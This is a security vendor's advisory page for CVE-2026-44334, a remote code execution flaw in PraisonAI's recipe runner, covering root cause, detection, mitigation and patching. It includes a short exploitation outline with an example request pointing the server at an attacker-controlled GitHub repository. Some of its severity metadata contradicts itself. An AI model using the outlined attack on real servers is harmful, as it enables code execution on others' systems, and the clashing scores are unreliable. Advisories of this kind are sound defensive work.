The SentinelOne Annual Threat Report - A Defenders Guide from the FrontlinesThe SentinelOne Annual Threat ReportGet the Report
Experiencing a Breach?Blog
Get StartedContact Us
SentinelOne
  • Platform
    Platform Overview
    • Singularity Platform
      Welcome to Integrated Enterprise Security
    • AI for Security
      Leading the Way in AI-Powered Security Solutions
    • Securing AI
      Accelerate AI Adoption with Secure AI Tools, Apps, and Agents.
    • How It Works
      The Singularity XDR Difference
    • Singularity Marketplace
      One-Click Integrations to Unlock the Power of XDR
    • Pricing & Packaging
      Comparisons and Guidance at a Glance
    Data & AI
    • Purple AI
      Accelerate SecOps with Generative AI
    • Singularity Hyperautomation
      Easily Automate Security Processes
    • AI-SIEM
      The AI SIEM for the Autonomous SOC
    • AI Data Pipelines
      Security Data Pipeline for AI SIEM and Data Optimization
    • Singularity Data Lake
      AI-Powered, Unified Data Lake
    • Singularity Data Lake for Log Analytics
      Seamlessly Ingest Data from On-Prem, Cloud or Hybrid Environments
    Endpoint Security
    • Singularity Endpoint
      Autonomous Prevention, Detection, and Response
    • Singularity XDR
      Native & Open Protection, Detection, and Response
    • Singularity RemoteOps Forensics
      Orchestrate Forensics at Scale
    • Singularity Threat Intelligence
      Comprehensive Adversary Intelligence
    • Singularity Vulnerability Management
      Application & OS Vulnerability Management
    • Singularity Identity
      Identity Threat Detection and Response
    Cloud Security
    • Singularity Cloud Security
      Block Attacks with an AI-Powered CNAPP
    • Singularity Cloud Native Security
      Secure Cloud and Development Resources
    • Singularity Cloud Workload Security
      Real-Time Cloud Workload Protection Platform
    • Singularity Cloud Data Security
      AI-Powered Threat Detection for Cloud Storage
    • Singularity Cloud Security Posture Management
      Detect and Remediate Cloud Misconfigurations
    Securing AI
    • Prompt Security
      Secure AI Tools Across Your Enterprise
  • Why SentinelOne?
    Why SentinelOne?
    • Why SentinelOne?
      Cybersecurity Built for What’s Next
    • Our Customers
      Trusted by the World’s Leading Enterprises
    • Industry Recognition
      Tested and Proven by the Experts
    • About Us
      The Industry Leader in Autonomous Cybersecurity
    Compare SentinelOne
    • Arctic Wolf
    • Broadcom
    • CrowdStrike
    • Cybereason
    • Microsoft
    • Palo Alto Networks
    • Sophos
    • Splunk
    • Trellix
    • Trend Micro
    • Wiz
    Verticals
    • Energy
    • Federal Government
    • Finance
    • Healthcare
    • Higher Education
    • K-12 Education
    • Manufacturing
    • Retail
    • State and Local Government
  • Services
    Managed Services
    • Managed Services Overview
      Wayfinder Threat Detection & Response
    • Threat Hunting
      World-Class Expertise and Threat Intelligence
    • Managed Detection & Response
      24/7/365 Expert MDR Across Your Entire Environment
    • Incident Readiness & Response
      DFIR, Breach Readiness, & Compromise Assessments
    Support, Deployment, & Health
    • Technical Account Management
      Customer Success with Personalized Service
    • SentinelOne GO
      Guided Onboarding & Deployment Advisory
    • SentinelOne University
      Live and On-Demand Training
    • Services Overview
      Comprehensive Solutions for Seamless Security Operations
    • SentinelOne Community
      Community Login
  • Partners
    Our Network
    • MSSP Partners
      Succeed Faster with SentinelOne
    • Singularity Marketplace
      Extend the Power of S1 Technology
    • Cyber Risk Partners
      Enlist Pro Response and Advisory Teams
    • Technology Alliances
      Integrated, Enterprise-Scale Solutions
    • SentinelOne for AWS
      Hosted in AWS Regions Around the World
    • Channel Partners
      Deliver the Right Solutions, Together
    • SentinelOne for Google Cloud
      Unified, Autonomous Security Giving Defenders the Advantage at Global Scale
    • Partner Locator
      Your Go-to Source for Our Top Partners in Your Region
    Partner Portal→
  • Resources
    Resource Center
    • Case Studies
    • Data Sheets
    • eBooks
    • Reports
    • Videos
    • Webinars
    • Whitepapers
    • Events
    View All Resources→
    Blog
    • Feature Spotlight
    • For CISO/CIO
    • From the Front Lines
    • Identity
    • Cloud
    • macOS
    • SentinelOne Blog
    Blog→
    Tech Resources
    • SentinelLABS
    • Ransomware Anthology
    • Cybersecurity 101
  • About
    About SentinelOne
    • About SentinelOne
      The Industry Leader in Cybersecurity
    • Investor Relations
      Financial Information & Events
    • SentinelLABS
      Threat Research for the Modern Threat Hunter
    • Careers
      The Latest Job Opportunities
    • Press & News
      Company Announcements
    • Cybersecurity Blog
      The Latest Cybersecurity Threats, News, & More
    • FAQ
      Get Answers to Our Most Frequently Asked Questions
    • DataSet
      The Live Data Platform
    • S Foundation
      Securing a Safer Future for All
    • S Ventures
      Investing in the Next Generation of Security, Data and AI
  • Pricing
Get StartedContact Us
CVE Vulnerability Database
Vulnerability Database/CVE-2026-44334

CVE-2026-44334: Praison Praisonai RCE Vulnerability

CVE-2026-44334 is a remote code execution flaw in Praison Praisonai that allows unauthenticated attackers to execute arbitrary code via unguarded tool imports. This post covers technical details, affected versions, and mitigations.

Published: May 18, 2026

CVE-2026-44334 Overview

CVE-2026-44334 is a code injection vulnerability [CWE-94] in PraisonAI, a multi-agent teams system. The flaw affects versions 4.5.139 through 4.6.31. An earlier fix for CVE-2026-40287 gated tools.py auto-import behind the PRAISONAI_ALLOW_LOCAL_TOOLS=true environment variable in tool_resolver.py and api/call.py. A third import sink in praisonai/templates/tool_override.py was missed and remains unguarded. The recipe runner reaches this sink on every recipe execution. Attackers can trigger it remotely via POST /v1/recipes/run by pointing the recipe value at any local absolute path or GitHub repository, because SecurityConfig.allow_any_github defaults to True.

Critical Impact

Unauthenticated attackers can achieve arbitrary code execution by dropping a malicious tools.py next to TEMPLATE.yaml, which the server then loads via exec_module().

Affected Products

  • PraisonAI versions 4.5.139 through 4.6.31
  • Deployments exposing the /v1/recipes/run API endpoint
  • Instances relying on default SecurityConfig.allow_any_github=True

Discovery Timeline

  • 2026-05-08 - CVE-2026-44334 published to NVD
  • 2026-05-08 - Last updated in NVD database

Technical Details for CVE-2026-44334

Vulnerability Analysis

The vulnerability stems from an incomplete remediation of CVE-2026-40287. The original fix introduced an environment variable gate, PRAISONAI_ALLOW_LOCAL_TOOLS, to restrict automatic loading of tools.py files alongside recipe templates. The fix applied this gate to tool_resolver.py and api/call.py. However, praisonai/templates/tool_override.py contains a third import sink that was overlooked. This sink imports user-supplied Python modules without checking the opt-in flag.

The recipe runner invokes this code path on every recipe execution. The POST /v1/recipes/run endpoint accepts a recipe parameter referencing either a local absolute path or a GitHub repository URL. The server fetches the referenced repository or reads the local directory, then loads any adjacent tools.py file using Python's exec_module(). No authentication is required by default. No environment opt-in is required to reach the vulnerable code path.

Root Cause

The root cause is an incomplete security control. The patch for CVE-2026-40287 missed an additional import location in the template override module. The CWE-94 classification reflects improper control of code generation, where untrusted Python source is executed as part of normal application flow.

Attack Vector

An attacker hosts a public GitHub repository containing a TEMPLATE.yaml file and a malicious tools.py file. The attacker sends a POST request to /v1/recipes/run with the recipe field set to the repository URL. The PraisonAI server clones the repository and executes the recipe. During execution, tool_override.py imports tools.py, invoking exec_module() on attacker-controlled Python code. The attacker gains code execution in the context of the PraisonAI process.

// Exploitation flow (described in prose - no verified PoC code available)
// 1. Attacker creates GitHub repo with TEMPLATE.yaml + malicious tools.py
// 2. POST /v1/recipes/run { "recipe": "https://github.com/attacker/repo" }
// 3. Server fetches repo, recipe runner invokes tool_override.py
// 4. Unguarded import sink calls exec_module() on tools.py
// 5. Arbitrary Python executes in server context

Detection Methods for CVE-2026-44334

Indicators of Compromise

  • Unexpected outbound connections from PraisonAI hosts to GitHub repositories not authorized by the organization
  • Presence of unfamiliar tools.py files in recipe template directories
  • Process spawns from the PraisonAI service account that deviate from baseline behavior
  • Access log entries for POST /v1/recipes/run referencing external or untrusted recipe sources

Detection Strategies

  • Inspect web server and reverse proxy logs for POST /v1/recipes/run requests with recipe values containing absolute filesystem paths or arbitrary GitHub URLs
  • Monitor for child processes spawned by the PraisonAI runtime that perform network connections, shell execution, or filesystem modification outside expected recipe behavior
  • Audit recipe template directories for newly written tools.py files and compare hashes against known-good templates

Monitoring Recommendations

  • Enable application-level logging that captures the full recipe argument for every /v1/recipes/run invocation
  • Forward PraisonAI host telemetry to a centralized data lake for correlation between HTTP requests and subsequent process activity
  • Alert on any invocation of importlib or exec_module paths originating from tool_override.py if instrumentation is available

How to Mitigate CVE-2026-44334

Immediate Actions Required

  • Upgrade PraisonAI to version 4.6.32 or later, which closes the unguarded import sink in tool_override.py
  • Restrict network access to the /v1/recipes/run endpoint until the upgrade is complete
  • Set SecurityConfig.allow_any_github to False to prevent loading recipes from arbitrary GitHub repositories
  • Enforce authentication on the PraisonAI API surface; the default configuration requires no authentication

Patch Information

The maintainers patched this issue in PraisonAI version 4.6.32. The fix extends the PRAISONAI_ALLOW_LOCAL_TOOLS gate to the third import sink in praisonai/templates/tool_override.py. See the GitHub Security Advisory GHSA-xcmw-grxf-wjhj for full details.

Workarounds

  • Place PraisonAI behind a reverse proxy that requires authentication and blocks external access to /v1/recipes/run
  • Restrict recipe sources to a maintained allowlist of internal Git repositories by overriding SecurityConfig.allow_any_github
  • Run the PraisonAI service under a low-privilege account with no write access to sensitive paths and no outbound network egress beyond required dependencies
bash
# Configuration example - upgrade and restrict recipe sources
pip install --upgrade 'praisonai>=4.6.32'

# Disable arbitrary GitHub recipe loading in SecurityConfig
export PRAISONAI_ALLOW_ANY_GITHUB=false
export PRAISONAI_ALLOW_LOCAL_TOOLS=false

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

  • Vulnerability Details
  • TypeRCE
  • Vendor/TechPraisonai
  • SeverityHIGH
  • CVSS Score8.4
  • EPSS Probability0.02%
  • Known ExploitedNo
  • CVSS Vector
  • CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • Impact Assessment
  • ConfidentialityLow
  • IntegrityNone
  • AvailabilityHigh
  • CWE References
  • CWE-94
  • Vendor Resources
  • GitHub Security Advisory
  • Related CVEs
  • CVE-2026-40287: PraisonAI RCE Vulnerability
  • CVE-2026-40288: PraisonAI YAML Workflow RCE Vulnerability
  • CVE-2026-40156: PraisonAI RCE Vulnerability
  • CVE-2026-40158: PraisonAI Sandbox Bypass RCE Vulnerability
Default Legacy - Prefooter | Experience the World’s Most Advanced Cybersecurity Platform

Experience the Most Advanced Cybersecurity Platform

See how the world’s most intelligent, autonomous cybersecurity platform can protect your organization today and into the future.

Try SentinelOne
  • Get Started
  • Get a Demo
  • Product Tour
  • Why SentinelOne
  • Pricing & Packaging
  • FAQ
  • Contact
  • Contact Us
  • Customer Support
  • SentinelOne Status
  • Language
  • Platform
  • Singularity Platform
  • Singularity Endpoint
  • Singularity Cloud
  • Singularity AI-SIEM
  • Singularity Identity
  • Singularity Marketplace
  • Purple AI
  • Services
  • Wayfinder TDR
  • SentinelOne GO
  • Technical Account Management
  • Support Services
  • Verticals
  • Energy
  • Federal Government
  • Finance
  • Healthcare
  • Higher Education
  • K-12 Education
  • Manufacturing
  • Retail
  • State and Local Government
  • Cybersecurity for SMB
  • Resources
  • Blog
  • Labs
  • Case Studies
  • Videos
  • Product Tours
  • Events
  • Cybersecurity 101
  • eBooks
  • Webinars
  • Whitepapers
  • Press
  • News
  • Ransomware Anthology
  • Company
  • About Us
  • Our Customers
  • Careers
  • Partners
  • Legal & Compliance
  • Security & Compliance
  • Investor Relations
  • S Foundation
  • S Ventures

©2026 SentinelOne, All Rights Reserved.

Privacy Notice Terms of Use

English